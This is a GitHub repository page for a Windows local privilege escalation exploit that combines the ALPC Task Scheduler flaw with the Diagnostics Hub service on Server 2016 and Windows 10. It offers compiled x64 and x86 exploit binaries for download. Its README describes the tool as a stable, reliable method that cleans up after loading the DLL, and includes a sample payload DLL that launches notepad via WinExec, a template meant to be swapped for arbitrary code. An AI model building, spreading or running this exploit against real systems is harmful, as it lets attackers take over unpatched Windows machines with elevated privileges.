Skip to content
Utilizing the ALPC Flaw in combiniation with Diagnostics Hub as found in Server 2016 and Windows 10.
C C++
Branch: master
Clone or download
Latest commit 72f3e4e Nov 3, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
ALPC-TaskSched-LPE Initial Diagnostics Hub for ALPC cause YOLO Nov 2, 2018
ALPC-TaskSched-LPE.sln Initial Diagnostics Hub for ALPC cause YOLO Nov 2, 2018
ALPC_DiagHub.x64.exe What the fuck just happend Nov 2, 2018
ALPC_DiagHub.x86.exe
Image Pasted at 2018-11-2 20-06.png.jpg screeeens galore Nov 2, 2018
Image Pasted at 2018-11-2 20-09.png screeeens galore Nov 2, 2018
README.md updates Nov 2, 2018

README.md

About

Project seeks to have a stable / reliable method for ALPC exploit originally disclosed by Sandbox Escaper.

Attempts to clean up itself after loading the DLL.

Screenshots :

Example Payload :

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        WinExec("C:\\Windows\\System32\\notepad.exe", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        return 0;
}
You can’t perform that action at this time.